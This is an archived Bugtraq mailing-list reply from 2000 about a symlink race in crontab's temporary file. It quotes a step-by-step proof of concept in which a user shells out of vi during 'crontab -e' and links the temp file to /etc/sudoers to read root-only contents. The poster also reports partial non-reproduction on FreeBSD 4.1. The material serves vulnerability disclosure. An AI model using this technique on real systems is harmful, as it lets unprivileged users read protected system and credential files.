Bugtraq mailing list archives
Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability
From: Andrey Alekseyev <uitm () ZENON NET>
Date: Wed, 25 Oct 2000 16:07:23 +0400
Well, performing a quick test, I was unable to reproduce the example below with the crontab that comes with FreeBSD 4.1-RELEASE. I was only able to install files containing more than 3 characters in a line and only if these were digits. Otherwise crontab complains about line format. I was also able to successfully install a file with all lines commented out with '#' (local /etc/inetd.conf). Of course, it's possible to import /etc/crontab mode 0600.
Hi,

Tested on
4.0-RELEASE FreeBSD 4.0-RELEASE #9
4.1-RELEASE FreeBSD 4.1-RELEASE #1:

Can read any file which starts with comment symbol (#)

$ ls -l /etc/sudoers
-r-------- 1 root wheel 313 24 oct 20:20 /etc/sudoers
$ id
uid=1002(alf) gid=1002(alf) groups=1002(alf)
$ crontab -e
~
~
~
/tmp/crontab.hLmjTbK417
:!sh
[ #### Make symbolic link]
rm /tmp/crontab.hLmjTbK417
ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417
exit
[ #### quit vi ]
/tmp/crontab.hLmjTbK417
crontab: installing new crontab
[ #### start crontab editor]
$ crontab -e
[####### See in vi]
# sudoers file.
#
# This file MUST be edited with the 'visudo' command as root.
#
# See the sudoers man page for the details on how to write a sudoers file.
#
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root ALL=(ALL) ALL
alf ALL=(ALL) ALL
~
~
~

If file started with no # then crontab said
"/tmp/crontab.GAeNMP1357":2: bad minute
crontab: errors in crontab file, can't install

--
------
Alf Delems<alf () isd memonet ru>
-- Andrey Alekseyev. Zenon N.S.P.